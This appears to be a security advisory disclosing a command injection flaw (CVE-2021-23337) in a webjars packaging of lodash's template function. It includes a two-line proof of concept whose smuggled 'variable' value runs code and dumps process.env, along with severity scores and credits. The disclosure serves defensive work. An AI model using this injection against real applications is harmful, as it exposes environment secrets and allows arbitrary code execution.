Command Injection
Affecting org.fujion.webjars:lodash artifact, versions [0,]
Report new vulnerabilities
Do your applications use this vulnerable package?
Test your applications
Overview
org.fujion.webjars:lodash is a modern JavaScript utility library delivering modularity, performance, & extras.
Affected versions of this package are vulnerable to Command Injection via template
.
PoC
var _ = require('lodash');
_.template('', { variable: '){console.log(process.env)}; with(obj' })()
Remediation
There is no fixed version for org.fujion.webjars:lodash
.
References
CVSS Score
7.2
high severity
-
Attack VectorNetwork
-
Attack ComplexityLow
-
Privileges RequiredHigh
-
User InteractionNone
-
ScopeUnchanged
-
ConfidentialityHigh
-
IntegrityHigh
-
AvailabilityHigh
- Credit
- Marc Hassan
- CVE
- CVE-2021-23337
- CWE
- CWE-78
- Snyk ID
- SNYK-JAVA-ORGFUJIONWEBJARS-1074932
- Disclosed
- 17 Nov, 2020
- Published
- 15 Feb, 2021